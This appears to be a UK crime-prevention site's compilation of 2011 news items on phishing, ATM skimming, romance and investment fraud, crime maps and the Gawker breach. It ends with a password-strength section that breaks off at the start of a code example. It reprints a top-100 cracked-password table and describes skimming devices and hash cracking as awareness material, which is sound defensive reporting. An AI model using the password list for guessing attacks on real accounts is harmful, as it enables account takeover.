AVCIS does not exist in isolation, but operates within a complex and dynamic environment where national priorities are changing and high-level strategies require constant interpretation and reinterpretation. AVCIS works with partner agencies and all stakeholders within the trade and associated businesses to provide the most effective response. AVCIS speaks for the UK policing in respect of vehicle enabled crime matters.

AVCIS incorporates a number of specialist functions including TruckPol, the national freight crime intelligence service, and the Vehicle Fraud Unit who investigate organised finance fraud.

AVCIS offers the UK Police Service:
• A single point of contact for advice in relation to vehicle crime
• A team committed to tackling vehicle enabled crime
• An opportunity to work free from the barriers and constraints of a single police force
• No draw on resources for other operational matters
• A credible voice for the service within the industry
• A new concept with the full backing of the ACPO and therefore, by definition, of all police forces in the UK

AVCIS - The Facts
• AVCIS have recovered in excess of 2,600 vehicles
• The total value of recovered assets exceeds £34 million
• AVCIS have made over 270 arrests.

Association of Chief Police Officers : www.acpo.police.uk
ACPO Vehicle Crime Intelligence Service (AVCIS) : www.avcis.org

(11th February 2011)


 

WATCH OUT FOR THIS COUNCIL TAX SCAM
(Yahoo Finance / lovemoney.com, dated 4th February 2011 author Rachel Wait)

If I had a penny for every time I heard the word scam, I'd have earned a fortune by now. Indeed, the number of scams doing the rounds seems to be getting higher and higher by the day.

About a year ago, fraudsters were caught sending out thousands of tax refund 'phishing' emails following the 31 January tax deadline. The email asked receivers to enter their credit card or bank details into an online form so that the rebate could be paid out.

But anyone who did so would find their account emptied, their credit card used to the limit, and in some cases, they even became a victim of identity fraud.

Now, a year on, and a similar scam is doing the rounds - this time regarding council tax.

How the scam works

The scam is operated by both email and telephone. Fraudsters contact you to say you're due a financial reward as a thank you for paying your council tax by direct debit.

The emails and calls claim to be from the 'Council Tax Head Office in London' and say you can earn a refund of hundreds of pounds if you provide your personal details, including your bank account details. There is, of course, no such thing as the Council Tax Head Office in London.

The scammers may also provide you with a phone number for you to call should you require more information. However, the numbers provided are thought to be connected to premium rate lines, meaning if you phone one, you could be charged at an extortionate rate.

What's more, if you then hand over your bank details - either by phone or in response to an email - the fraudsters will be able to access your bank account and the next time you check it, it's likely to be looking considerably less healthy.

What you can do

Several local councils, including Enfield and Lewisham in London, Aberdeen, Brighton and Hove, and the Wirral, have warned about the scam on their websites. So if you do have concerns, have a look on your local council's website to see if there are any further details.

It's worth remembering that your local council won't cold call, text or email you in this way, asking for bank details. If you are due any type of refund, your local council will contact you through the post explaining the situation.

So if you do receive a phone call to say you're due a financial reward on your council tax, hang up immediately - you may find they call back, but simply don't answer. And if you receive an email, don't click on any links in the email, don't press reply, and don't phone any numbers you've been given. And most importantly, don't hand over any personal details or bank account numbers.

If you are unsure about the validity of a call or email about council tax (or any other council service), get in touch with your local council. You'll be able to find the phone number of your local council on their website.

You can also seek advice from Consumer Direct on 08454 04 05 06 or check out the website.

Stay safe

These days, scams can be for just about anything. And the vast majority of us will have received a phishing email at some point in our lives.

The easiest way to spot a phishing scam is by looking at the spelling. Phishing emails are usually full of bad spelling and grammar. Not only that, but they tend to use generic greetings such as 'Dear customer' and 'Best regards'. So if you spot any of these trademarks, alarm bells should start to ring.

There may also be a sense of urgency to the email and of course, it's likely to ask you for personal details and bank account numbers - usually suggesting you need to respond immediately.

It's also a good idea to check any company names used in the email. Scammers often use a company name that looks similar to the real deal and if you've only looked at it quickly, you're unlikely to notice.

Finally, if you're concerned about telephone scams, it's worth registering with the Telephone Preference Service to request that unsolicited phone calls be stopped, although some scammers may find a way to call you regardless. This service is free.

If you're after some more general tips on how to stay safe online, check out our articles 12 tips to keep you safe online and 14 ways to protect your privacy.


 

LBE WARNING: COUNCIL TAX SCAM
(London Borough of Enfield website)
www.enfield.gov.uk

Residents are being urged not to give out personal information following reports of scam phone calls and e-mails offering refunds of overpaid Council Tax.

The calls and e-mails claim to be from the Council Tax Head Office in London and offer refunds of hundreds of pounds if the recipient gives out personal details, including their bank account numbers.

As part of the scam, three phone numbers have been given to people who want more information about their supposed refunds - 020 8123 0965, 020 3286 1358 and 020 8123 2739.

These phone calls and e-mails have no connection to the Council and we urge people not to give their bank details or other personal information to people who contact them out of the blue.

Anyone who is unsure about the validity of a call or e-mail about the Council or Council services should get in touch with us before they give out any information.

Anyone with concerns or questions about their Council Tax should call Enfield Council 020 8379 1000 or e-mail revs@enfield.gov.uk

To report a scam, call Consumer Direct on 08454 04 05 06 or email them; details can be found at https://secure.consumerdirect.gov.uk/reportascam.aspx

(5th February 2011)



BRIGHTON NAMED AS BRITAIN'S CARD FRAUD CAPITAL
(Sky News, dated 19th January 2011)
http://news.sky.com

 

Brighton is apparently now the worst place in Britain for credit and debit card fraud, knocking London off the top spot.

The tourist hotspot has leapt to the top of the league from 10th place last year in an annual study by life assistance company CPP.

The report found that 38% of people in Brighton said their details had been used by fraudsters at some point.

London came second with 34%, while Manchester was third with 33%.

There were also above-average instances of people falling victim to card fraud in Leeds, Bristol, Edinburgh and Southampton.

The CPP Card Fraud Index estimates that around 13 million Brits have now been affected by card fraud.

Around 28% of people said their credit or debit card had been used by fraudsters at some point, 7% of whom had been victims during the past 12 months.

But there is some positive news - the number of people affected during 2010 was slightly down on the 10% who were victims in 2009.

Sarah Blaney, card fraud expert at CPP, said: "In 2010 we saw a 3% decrease in card fraud incidents in the UK compared to the previous year.

"This in itself is good news and shows how progress is being made to reduce the number of victims. In particular, online fraud has decreased, which could be a result of industry initiatives such as Verified by Visa and MasterCard SecureCode.

"However, with card fraud costing the UK £440m a year, consumers still need to remain vigilant and not let their guard down."

Victims of card fraud reported the average amount stolen was £417 with 4% claiming losses of more than £2,000.

One in five people said they have had the magnetic strip on their card cloned at an ATM or chip and pin machine.

The same proportion said fraudsters had obtained their card details through the internet.

As many as a third of people said they did not even realise they had been the victims of fraud until they were contacted by their bank or their card was refused.

The research also found that many people were putting themselves at risk of card fraud by failing to take simple measures to protect themselves.

Around 18% of people said they never checked an ATM to see if it had been tampered with, while 17% said they did not shield their fingers when keying in their pin.

(5th February 2011)


 

FIVE TIPS TO PROTECT YOURSELF FROM ATM FRAUD
(Yahoo Finance / lovemoney.com, dated 2nd February 2011 author Donna Ferguson)

Ever heard of skimming? If you think it involves removing the floaty bits from a hot chocolate, think again. Skimming is a form of ATM fraud and it's a problem in many parts of the world.

Indeed, a man in China was recently jailed after withdrawing over 120,000 yuan (around £11,424) from other people's bank accounts using passwords he got hold of from a homemade ATM in Beijing!

The man had been installing card skimming devices and cameras at ATMs around Beijing since 2007 and used the stolen data to create counterfeits. However, after a close call, he changed tactics and got hold of a fake machine casing as well as other equipment to gather important data in a different way. He managed to forge a total of 31 cards.

Back in the UK, card protection firm CPP recently named Brighton as the UK's card fraud capital, with a staggering 38% of people having fallen victim to card crime in the past year.

However, London is almost as bad, with 34% of people having been defrauded, followed by Manchester (33%), Leeds (32%) and Bristol (32%).

So what is skimming and how does it work? And most importantly, how can you protect yourself?

How card skimming works

The most common form of skimming occurs when you go to use an ATM (automatic teller machine) and don't realise that a false front has been attached to the card reader - where you insert your card. This then captures your card number and transmits it wirelessly to someone waiting nearby.

A hidden camera will also be attached to the machine - perhaps in a leaflet holder, a loose wire or a loose fitting - and this will capture your PIN as you enter it.

Alternatively, criminals will use a keypad overlay that matches up with the buttons of the legitimate keypad below it, recording what is pressed and transmitting it to the fraudsters via a wireless device.

Criminals will then be able to make a copy of your card and use it, along with the PIN, to withdraw funds and buy goods. So the next time you check your bank account, it's likely to be empty.

Another technique used is where your card gets stuck in the machine and a kind passer-by offers to try your PIN for you. When this doesn't work, the same passer-by then offers to stand guard while you report the problem to the bank. The fraudster then takes the card and uses the PIN you gave him or her to withdraw your cash.

Here are five ways to protect yourself from ATM fraud:

1. Protect your PIN

It goes without saying that you should never carry your PIN on you, in case you get mugged.  That includes putting your PIN in your mobile phone as a contact under the name of your bank or an obvious entry like 'Pin'.

Similarly, protect your PIN while you're at the ATM. Cover it with your hand when you enter it, and don't ever give it to anyone, especially if there's a problem with the machine.

Some fraudsters have been known to dress in bank uniforms and hang out by the machine, so even official-seeming offers to help should be rejected.

2. Pick your ATMs carefully

Try to only use ATMs inside a bank or those you are familiar with, as you are more likely to spot whether there's something different about the keypad or the card insert device. If you must use an ATM at night, avoid dimly-lit areas and opt for ATMs protected by CCTV.

3. Get cashback from shops instead

Each visit to an ATM involves potential risk - so try to make as few trips as you can.
Instead, try to get cashback from a reputable retailer when you make a purchase. Most supermarkets offer cashback and you don't need to make a large purchase to get your cash.

Remember to protect your PIN from prying eyes again, and don't let the card out of your sight or even your hands, if possible.

4. Keep track of your accounts

Under the UK's Banking Code, banks are obliged to compensate you if you are a victim of card fraud.

However, if a large amount of time goes by before you notice it, the bank could argue you did not take reasonable care and potentially legitimately refuse to compensate you on that basis. In other words, the sooner you notice and report a fraud, the more likely it is that your bank will deal with your claim for compensation quickly and fairly.

So it's wise to regularly check all your bank accounts to ensure everything is correct.

Always open your bank and credit card statements promptly as well to ensure nothing is amiss.

5. Be suspicious

Always check the ATM to see whether anything looks suspicious - if anything has been added or changed, either go to a different ATM or, if you're outside a bank, go inside to ask about the changes.

Check the card reader before inserting your card. If you feel a small prong, then it's a false front - don't use it. Tell the bank.

Some modern ATMs run a picture of what the slot and keypad are supposed to look like, so keep an eye out for these and check whether anything looks different from the picture displayed.

What to do if you're a victim

1. Report the fraud - and any theft - to your bank immediately.

2. Report the fraud to the police.

3. Check your credit report to ensure the fraudsters haven't also stolen your identity. Consider buying protective registration from CIFAS. It only costs £14.10 and will force anyone applying for credit in your name to undergo extra identity checks.

(5th February 2011)




2011 SCAMS AWARENESS MONTH
(City of London Police, dated 2nd February 2011)
http://www.cityoflondon.police.uk

 

The City of London Police has joined with other local authorities and partners to work together to support the Office of Fair Trading (OFT) 2011 Scams Awareness Month, which was launched on 1 Feb. The campaign aims to raise awareness of the problem with mass marketed scams in Britain which arrive by post, email, text, phone or the internet to con people into parting with their cash.

The campaign calls on consumers to drop scam mailings they have received into designated 'Scamnesty' bins or boxes at local libraries and public areas across the country.

New research commissioned by the OFT shows that 39% of people who lost money to a scam were victims of money transfer or an advance fee scam. These dupe people into handing over their bank details or paying an up-front fee by leading them to believe they are entitled to an inheritance, donating to charity or even helping release funds from a corrupt country.

The survey also found:

• 1 in 12 people (4%) lost money to a scam last year
• 61% of people said they think scams looking real made them get involved
• Of those who reported being scammed in the last 12 months, 7% lost more than £4000
• 39% who were scammed in last 12 months did not report it to the authorities

Michele Shambrook, Operations Manager for the OFT-managed advice service Consumer Direct said: "Scammers are using ever more sophisticated and cunning tactics to dupe people out of their cash. We want people to recognise the warning signs, and feel confident enough to seek advice from friends and family or from Consumer Direct."

To find out more information or report a scam visit the Consumer Direct website: www.consumerdirect.gov.uk/scamnesty.

(5th February 2011)


 


CHILDREN'S SAFETY

When I was a kid I did some very stupid things; I suppose it's all part of being a kid. Another saying is "a little knowledge is a bad thing". Mix the two and you have the potential for an accident.

When I was at junior school I heard of something called an electro-magnet. I had a horseshoe magnet at home, so how would a kid turn it into an electro-magnet? Come on, you're a grown up, you must know? Using my junior school logic you apply electricity to it, don't you... (NO you don't). So I placed my horseshoe magnet across the Live and Neutral of a plug that was in a socket in my bedroom. BANG!!! When I woke up, I discovered that I had been blown 8 feet away from the socket. The plug and socket were a burnt out mess and the house was in darkness.
A minute later my parents appeared at my bedroom door in a state of panic. Remember, this was the time of fuse boxes, not high tech consumer units that switch off dangerous conditions that it senses in ring mains. This little stunt could have killed me and is something you should definitely not do at home.

Then there was the time I tried to build a paper house around some birthday candles. That didn't work and I burnt both hands, but the people were nice at the hospital.

Then there was the time that I made some crossbows out of scrap wood in my Father's workshop. I managed to cut both the wood and the skin between my thumb and index finger with a crosscut saw to the depth of about an inch... loads of blood. The people at the hospital were nice again!

Then there was the time I got my thumb caught in a car door when it was being shut...the time when a Doctor had to put some small forceps up one of my nostrils to remove a bead from the nasal cavity. Then the go-cart made using pram wheels, no brakes, luckily no cars in the 60's (no not 1860's) !

So I got through my childhood with no broken bones, but I did manage to obtain a scratch, graze , cut or bruise on every limb. Sadly some of my friends were not so lucky.

My parents' advice for safety: don't drink bleach, don't go off with strangers, look both ways when crossing the road, hold the handrail when the bus is moving (nothing about jumping off of the platform of a Routemaster bus when it is moving though... done that), don't run if a pack of dogs approach you!

Other than basic advice about child safety (i.e. ensure your child has a polio vaccination) I can only assume that the Governments of the 50's and 60's thought of child accidental deaths as a convenient way of culling the children of the working class population (my attempt at political satire).

Luckily now there are websites like www.capt.org.uk to provide some practical safety guidance.

The Child Accident Prevention Trust (CAPT) is the UK's leading charity working to reduce the number of children and young people killed, disabled or seriously injured in accidents.

They exist because accidents are a leading cause of death and serious injury for children and young people. Many of these accidents can be prevented.

Did you know…?

- Accidental injury is one of the biggest killers of children in the UK. It is second only to cancer.
- Childhood accidents cost the NHS over £275 million a year.
- Children from the poorest UK families are 13 times more likely to die in accidents. They are also more likely to be admitted to hospital with accidental injuries.

TAKE CARE OF YOURSELF AND YOUR FAMILY

(5th February 2011)


 



TSA TO TEST PRIVACY-ENHANCING SOFTWARE ON WHOLE BODY SCANNERS
(ComputerWorld, dated 1st February 2011 author Jaikumar Vijayan)
http://www.computerworld.com

The Transportation Security Administration (TSA) will soon begin testing new software designed to better protect the privacy of individuals passing through its full body scanners at U.S. airports.

The TSA says that the new software will eliminate the passenger-specific images that are generated by current Advanced Imaging Technology machines and replace them with generic images instead.

The software is designed to automatically detect potentially dangerous items on a person and to indicate their location on a generic outline of the individual, the TSA said in a statement.

Testing of the new software began today at Las Vegas' McCarran International Airport. Similar tests are scheduled to begin over the next few days at Atlanta's Hartsfield Jackson airport and at the Ronald Reagan National Airport in Arlington, Va.

The testing is being done to confirm if the new software will yield the "same high level of security" as the body scanners currently in use at U.S. airports, but with better privacy protections, TSA Administrator John Pistole said today in a statement.

The TSA's move to test the new privacy-enhancing software appears designed to defuse stubborn concerns relating to the use of such systems. Though polls have suggested that a majority of Americans support the use of such scanners, several groups have expressed concerns over the technology and have asked for a thorough review of its usefulness.

Whole body imagers or advanced imaging technology (AIT) scanners, as the TSA calls them, are supposed to help detect non-metallic weapons and explosives concealed under a passenger's clothing. One example is the explosive PETN powder that would-be Christmas Day bomber Umar Farouk Abdulmutallab concealed in his underwear.

The TSA has already deployed, or is deploying, hundreds of such scanners around the country. By 2014, about 900 of the machines are expected to be installed at a cost of $130,000 to $170,000 per scanner.

Groups such as the Electronic Privacy Information Center (EPIC) have said that the detailed, three-dimensional images of passengers that are generated by such scanners are overly invasive and equivalent to a physical strip search. They have also challenged the TSA's claims about the efficacy of such systems in helping detect concealed threats.

EPIC and others have been pressing for a complete review of the technology and of its privacy implications. Even the Government Accountability Office (GAO) has called for a more thorough vetting of the technology over similar concerns.

The TSA has steadfastly downplayed such concerns. It has noted that the images generated by the scanners are too indistinct to identify individuals. It also notes that the agents who actually see the scanned images are located in a viewing station some distance away from the actual scanner so they have no idea of who is being scanned at any time.

The TSA has also repeatedly insisted that its scanners do not store images of scanned passengers -- an assertion that has been challenged by EPIC and others.

EPIC said today that the TSA's moves do not go far enough. "We are not at all convinced," that the new software will address privacy concerns, said Marc Rotenberg, president of EPIC. He said using the new software would actually create new privacy concerns because the TSA has indicated that it no longer needs a remote viewing facility once the new software becomes operational.

"We will be filing a FOIA lawsuit this week for more information about the revised airport screening software," Rotenberg said. He added that EPIC's previous lawsuit seeking a suspension of the body scanning program is scheduled for March 10 before the D.C. Circuit Court of Appeals.

(5th February 2011)


 

MET RE-LAUNCHES WEBSITE TO WARN OF LATEST SCAMS TO HIT THE UK
(Courtesy of Metropolitan Police, Bulletin 0000002211, dated 1st February 2011)
http://www.met.police.uk/

Officers from the MPS's Operation Sterling have today launched their new scam awareness website in support of Scam Awareness Month.

The 'new look' re-launched website, named 'Fraud Alert' is a one stop shop designed to equip members of the public and businesses with the tools they need to protect themselves against fraud.

The website will be updated as soon as a new scam that is targeting victims in the UK is discovered. For example, the latest scam to feature relates to fraudulent mail, which Police often refer to as Mass Marketing Fraud. Sent by professional fraudsters, these letters are designed to con recipients into investing in bogus schemes such as fake lotteries, share frauds and inheritance scams. They usually target the elderly and vulnerable.

Operation Sterling are not only proactively trying to stop this mail being delivered, they are also offering prevention advice and tips on the fraud alert website.

The website provides a check list for members of the public to identify whether they are being scammed or not and also offers the prevention advice they need to stop themselves becoming victims of fraud. Additionally there is information on the website which explains how victims of fraud can report such activity.

Offering support to those who need more information and those who could potentially become victims of fraud is important to the MPS.

Detective Chief Inspector Nick Downing, from the Economic and Specialist Crime Command, said: "We hope that members of the public will use fraud alert to see up to date information on the latest scams being used to con them out of their hard earned cash.

"The new format should make it easier for those who don't regularly use computers to navigate their way around the alerts and the prevention advice available.

"Supporting our partners in raising awareness about frauds such as those detailed on the new site, is a priority for the prevention work that Operation Sterling are engaged with."

The MPS would urge anyone who thinks they may have been a victim of fraud to visit the new website at:
http://www.met.police.uk/fraudalert/reporting_fraud.htm

For fraud prevention advice please visit: http://www.met.police.uk/fraudalert/

(2nd February 2011)


 

FRIENDS REUNITED LOVE SCAM COSTS MUM-OF-THREE £80,000
(Metro, dated 31st January 2011 author Aidan Radnedge)
www.metro.co.uk

Mother-of-three Kate Roberts has told how she was tricked out of £80,000 by a fraudster posing as a lonely US soldier on the Friends Reunited website.

Ms Roberts lost her house in the scam, just ten months after she 'fell in love' with Sgt Mark Ray Smith. 'Aside from losing the money, I feel like I've lost the love of my life,' said the divorcée. 'I know he wasn't real but the feelings were real to me and that's very difficult to come to terms with.'

She now wants to warn others falling for what the US embassy warned was an 'increasingly common' type of fraud.

Ms Roberts was sucked in after clicking on the 'find someone perfect for you' area of Friends Reunited in October 2009.
She found a man claiming to be a 43-year-old widower serving in Iraq who had an 11-year-old daughter. They exchanged emails and started chatting several times a day on MSN. He even began calling after she gave him £225 for a phone line. The scammers posted pictures of a soldier in uniform and bare-chested. They even used a picture of a little girl to represent the daughter.

'What I am most worried about is that I emailed him pictures of myself and my children,' Ms Roberts, 47, told the BBC's Inside Out - South programme. 'I have no idea if those pictures are now being used by the gang to con other people out of money.'

The fake sergeant then begged the administrator from Melton Mowbray, Leicestershire, for money to buy himself leave from the army, backed up by receipts on forged US military headed paper. He then wanted to buy his way out of the army for good.
Between October 2009 and July last year, Ms Roberts wired him £80,000 either via Western Union or direct to his bank account.

But she found it was a scam when all contact stopped after she arranged for £12,000 to be sent to a friend of Sgt Smith's to pay for his flight to Britain.  Her phone company traced his number to a mobile phone in Nigeria. She then alerted police. 'When the officers told me I was the victim of a highly organised scam my world fell apart,' said Ms Roberts.

The US embassy is trying to identify the soldier whose pictures were used.

(2nd February 2011)


 

GANG FACES JAIL FOR 2012 GAMES PROPERTY FRAUD
(Evening Standard, dated 1st February 2011 author Justin Davenport)
www.thisislondon.co.uk

Fraudsters who used the lure of the London Olympics to con pensioners into handing over their life savings were facing jail today.

The gang cold-called elderly people at home offering what they claimed was a lucrative property portfolio in Stratford, near the 2012 site.

Fraud squad officers who smashed the racket believe the gang got away with at least £300,000 between 2006 and 2007. Detectives traced up to 90 victims who each lost between £2,500 and £30,000.

Adrian Davison, 42, of south-east London, masterminded the scam, recruiting four accomplices - Andrew Bingham, 72, of East Sussex; Patrick Golding, 29, of Ashford, Kent; Kenneth Mullen, 42, of Lanarkshire, and Derrick Voysey, 63, of Buckinghamshire.

Victims were telephoned from a "boiler room" office in Barcelona, and urged to invest in bogus property schemes. Once hooked, they were sent glossy brochures and told to transfer money to the gang's front company, Almena Properties in Gibraltar, or to an address owned by Bingham in London.

In return they received fake share certificates and were repeatedly targeted to invest further.

The fraud came to light when a private investigator, looking to recover money owed to a client, discovered evidence of criminal activity in Almena's company accounts.

In October 2007 City of London Police were alerted and soon arrested Davison at his home. He and his accomplices were being sentenced today at Southwark crown court.

During the investigation detectives found victims so embarrassed that they continued to hide their losses from friends and family. One person only agreed to give evidence at a service station and had all his mail directed to his work address.

Detective constable Paul Kirk said today: "The gang used the coming of the Olympics to prey on the elderly and vulnerable, calling them day and night to steal their savings.

"This crime has taken a terrible toll on its victims, in some cases ruining their finances, their retirement and their health. This is one of the first cases I have heard of involving the Olympic Games."

Detectives worked with the Serious Fraud Office to obtain evidence from Spain, Latvia, Gibraltar and Albania. Davison was also found to be filtering off funds into a Somali bank. Police are now working to recover and return stolen money to investors.

In October Voysey was convicted of conspiracy to defraud, while Davison, Golding, Mullen and Bingham all admitted the same charge.

(2nd February 2011)


 

STREET-LEVEL CRIME MAPS LAUNCHED ONLINE
(BBC News, dated 1st February 2011)
www.bbc.co.uk

New online crime maps for England and Wales have been launched, allowing users to see which offences have been reported in their local streets.

Home Secretary Theresa May said the maps would give real facts and make police more accountable.

The public can search for information on crime and anti-social behaviour by entering a street name or postcode.

Some people have had problems accessing the website, www.police.uk. A minister said there had been heavy use. Policing Minister Nick Herbert told BBC Radio 4's Today programme that the website had been receiving 75,000 hits per minute.

A spokesman for charity Victim Support said it was important that victims of crime had consented as to whether information about their incident was released.

Meanwhile, Mrs May said she expected the public reaction to be positive and denied the information could increase fear or drive down house prices in some areas.

Visitors to the website, which cost £300,000 to develop, will be able to find out which crimes have taken place on or near their street within the past month and which officers are responsible for their area.

Information on crime is broken down into six categories - burglary, robbery, vehicle crime, violence, other crime and anti-social behaviour. Sex crimes have been included in the "other" category, along with crimes such as theft and shoplifting, to help prevent victims from being identified.

Local police appeals and details of police community meetings will also be published alongside the maps.

The website provides more detail, down to street-level, than existing online crime maps provided by forces in England and Wales.

Crime trends will also be established as the site develops and could be extended to include details on the outcomes of court cases, or a system for individual victims to track the progress of their case online.

The site shows more than 6,500 incidents of anti-social behaviour were recorded by police in England and Wales every day in December.

'Transparency agenda'
 
The Metropolitan Police was the force with the highest number of recorded incidents of anti-social behaviour in December - 34,463 incidents.

Police forces in Greater Manchester and West Midlands had the next highest number of incidents - 10,233 and 8,442 respectively. According to the maps, areas in Preston, Swansea and Essex are among the most crime-ridden places in England and Wales.

The government said the site was an important part of its "transparency agenda", making the data available in an open format so that communities could use it to "help people engage with the police in a meaningful way".

Mrs May said: "I think people are going to welcome the fact they can really see what's happening with crime in their area, not just on their street but in their neighbourhood.

"I think they will feel a greater connection with the police, with much more information about where they can go to, and who they can work with."

System 'confusing'
 
"This is giving people a real tool, real power to see that something is being done about crime in their area. This doesn't make them frightened, it actually makes them feel a part of what is happening."

Policing Minister Nick Herbert also insisted that the more detailed information would not increase the fear of crime, adding: "We can't sweep crime under the carpet."

Shadow home secretary Yvette Cooper welcomed the crime maps, although she said they "should also include police strength for forces across the UK". She said: "Knowing where crime takes place isn't enough if there aren't sufficient police to deal with it. "People want to know what effect the government's deep and rapid cuts to the police are going to have on their area."

Streets with fewer than 12 houses will only be included in a wider geographic area to prevent identification of victims. However, the inclusion of a "quiet street" as one of the most crime-ridden in the country has been criticised by the local council.

'Complete farce'
 
The crime maps show Surrey Street in Portsmouth, Hampshire, as having 136 crimes, including burglary, violence and anti-social behaviour in December.

But the street, which is less than 100m long, is only home to a pub, a car park and a block of flats.

Councillor Eleanor Scott, who is responsible for community safety at Portsmouth City Council, said: "If Portsmouth is anything to go by, this website is a complete farce, it's identifying wrong crime epicentres and missing out crimes in other areas so you can't rely on it."

Chief Superintendent Nigel Hindle, commander of Portsmouth police, said the postcode of Surrey Street was used to record incidents of retail crime such as shoplifting from the adjacent commercial centre and violent crime from nearby bars and clubs.

Victim Support said victims' privacy should be protected, but that enough information should be given to the public "for them to be able to hold the police and criminal justice system to account".

"Victims and witnesses of crime often tell us that the criminal justice system can be confusing and unwieldy. This recommendation to publish fuller information has the potential to bring greater transparency to the workings of the criminal justice system for victims, witnesses and the public."

Crime mapping website : http://www.police.uk

(2nd February 2011)




GAWKER HACK ANALYSIS REVEALS WEAK PASSWORDS
(Computerworld, dated 14th December 2010 author Gregg Keizer)
www.computerworld.com

 

The most popular password among nearly 400,000 exposed by the Gawker (this is an online magazine) hack was "12345," according to an analysis done by a security firm.

In second place was the word "password" itself.

The most common passwords were uncovered by Duo Security, an Ann Arbor, Mich.-based two-factor authentication provider, after running John the Ripper (JtR), a password hash cracking tool, on the list of Gawker user passwords posted on the Web over the weekend.

On Sunday, Gawker, which operates several popular technology sites, including Gizmodo and Lifehacker, confirmed that its servers had been hacked, and that hundreds of thousands of registered users' e-mail addresses, usernames and passwords had been accessed. A group calling itself "Gnosis" claimed credit for the attack and said it had pilfered more than 1.3 million accounts.

The top 25 passwords as ranked by Duo ranged from the absurdly easy-to-guess to the unintentionally hilarious, with "12345678" in third place, "monkey" in seventh, "letmein" in 10th, and "trustno1" -- a reference to the "Trust No One" expression popularized by the TV series The X-Files -- in 13th.

Using an eight-core Xeon-powered system, Duo Security brute-forced 400,000 password hashes of the 1.3 million stolen from Gawker, cracking the first 200,000 in under an hour.

That didn't come as a surprise to HD Moore, chief security officer at Rapid7.

"The DES crypt hash can be broken with ridiculous ease," said Moore in an e-mail reply to questions late Monday about the strength of the encryption used by Gawker to safeguard its users' passwords. "John the Ripper, along with most other tools, are well equipped to brute-force these."

Moore pointed out that the 56-bit DES (Data Encryption Standard) encryption used by Gawker had been broken more than a decade ago, when the Deep Crack machine built by the Electronic Frontier Foundation won a 1998 contest sponsored by RSA by breaking a DES key in just 56 hours. Six months later, EFF and Distributed.net collaborated to lower that time to just over 22 hours.

"These days, [graphics processor unit]-based cracking makes this even easier," noted Moore.

Duo Security uncovered other interesting tidbits during its analysis, including the fact that nearly all of the cracked passwords -- 99.45% -- were composed of alphanumeric characters only and did not contain any special characters or symbols.

Users are often urged to use special characters, such as the percent sign or ampersand symbol, and some enterprises require their employees to use the characters in self-set passwords.

Duo's analysis mirrored one done nearly two years ago by Imperva on a cache of 32 million unencrypted passwords disclosed after a hack of RockYou, a Facebook application developer.

Imperva noted that "123456" was the most common password in the collection posted on the Web by hackers, followed by "12345," "123456789," "password" and "iloveyou".

The ease with which Duo was able to decrypt hundreds of thousands of the leaked passwords lends credence to expectations that cybercriminals will do the same, then use the e-mail accounts, usernames and passwords to try to hack other accounts owned by the affected individuals.

On Monday, Andrew Storms, director of security operations at nCircle Security, said it was a sure bet that hackers would utilize the Gawker information, because many people reuse the same password for most of their e-mail and online accounts.

Storms was commenting on the news that some e-mail addresses revealed in the Gawker hack belonged to employees of federal, state and local governments, and that hackers would use the information in targeted attacks to gain access to agency networks.

Duo provided a clearer idea of the scope of the threat to governments, pointing out that 15 of the accounts for which it had cracked password encryption belonged to people working at NASA, nine were assigned to users employed by Congress, and six belonged to employees of the Department of Homeland Security.

Both Gawker and a host of security experts, including Moore, Storms and those at Duo, urged users whose Gawker accounts had been exposed to change their passwords for other sites or services if those passwords were the same or similar to the one associated with Gawker.

Moore provided Computerworld with steps users can take to determine whether their e-mail addresses were among those accessed in the Gawker hack. Since then, Duo Security has created a Web-based tool that users can run to see if they have been "Gawkered."

--------------

FURTHER INFORMATION

The following table shows the top 100 "lazy passwords" that were used by some of the Gawker websites' readership. These were gathered by the Duo Security company and tabulated by us. The number in brackets shows the number of Gawker readers who used the same "lazy password".

| TOP 1 to 20 | TOP 21 to 40 | TOP 41 to 60 | TOP 61 to 80 | TOP 81 to 100 |
|---|---|---|---|---|
| (2516) 123456 | (262) f**kyou | (167) pepper | (138) tigger | (115) midnight |
| (2188) password | (256) starwars | (165) jennifer | (137) charlie | (115) 123qwe |
| (1205) 12345678 | (255) shadow | (165) 666666 | (136) chicken | (114) scooter |
| (696) qwerty | (241) princess | (164) welcome | (135) nothing | (114) purple |
| (498) abc123 | (234) cheese | (164) buster | (132) f**koff | (114) banana |
| (459) 12345 | (231) 123123 | (161) Password | (130) deadspin | (113) matrix |
| (441) monkey | (229) computer | (159) batman | (125) valleywa | (113) jezebel |
| (413) 111111 | (225) gawker | (158) 1q2w3e4r | (125) qwerty12 | (113) daniel |
| (385) consumer | (223) football | (158) maggie | (125) george | (111) hunter |
| (376) letmein | (204) blafblah | (154) michelle | (124) swordfis | (111) freedom |
| (351) 1234 | (203) nintendo | (153) pokemon | (124) summer | (110) secret |
| (318) dragon | (199) 000000 | (153) killer | (122) asdf | (110) redsox |
| (307) trustno1 | (198) soccer | (153) andrew | (121) matthew | (108) spiderma |
| (303) baseball | (195) 654321 | (151) internet | (121) asdfg | (108) phoenix |
| (302) gizmodo | (193) asdfasdf | (150) biteme | (120) mustang | (108) joshua |
| (300) whatever | (185) master | (148) orange | (119) yankees | (108) jessica |
| (297) superman | (183) michael | (148) jordan | (117) hannah | (108) *sshole |
| (276) 1234567 | (182) passw0rd | (147) ginger | (117) asdfghjk | (108) asdf1234 |
| (266) sunshine | (175) hello | (145) 123 | (117) 1qaz2wsx | (107) william |
| (266) iloveyou | (170) kotaku | (144) aaaaaa | (116) cookie | (107) qwertyui |

So what's the problem?

You may be asking: it's only a web-based magazine, so what if someone hacks into that?
As mentioned in the main article, once someone has hacked into an online account (regardless of what it is), they could get the individual's name, email address, perhaps their home address, the company they work for (based on the email address), bank details and, perhaps more seriously, an understanding of the individual's mentality regarding online security.

For example, are you a member of any online school reunion websites? Are you a member of a family tree tracking website? If so, have you made public what schools you attended, your date of birth and where you were born? These are sometimes used as further check passwords for online bank accounts! All this information is normally freely available to other members. Based on some of this information someone could even legally (for illegal use - ID theft) obtain a copy of your birth certificate!

The people that hack these organisations are not spotty teenagers in their bedrooms, they are criminal businesses. Once they have the minimal piece of data on you they can start obtaining the rest.

Password recommendations

- Use at least 8 characters.
- Use capitals as well as lower case letters.
- Incorporate numbers amongst the letters ( alpha-numeric ), not just at the end.
- If the system allows, try and use symbols (& * % etc ) amongst the other characters.
- DO change your passwords on a regular basis.
- DON'T use names or place names.
- DON'T use dates of birth or even months of the year.
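
The checkable recommendations above, written as an automated test a sign-up form could run. This is an added example, not code from the original article or from Duo Security; the deny-list and name list are small constructed samples taken from the table above, and `check_password` and its rule codes are hypothetical names.

```python
import re
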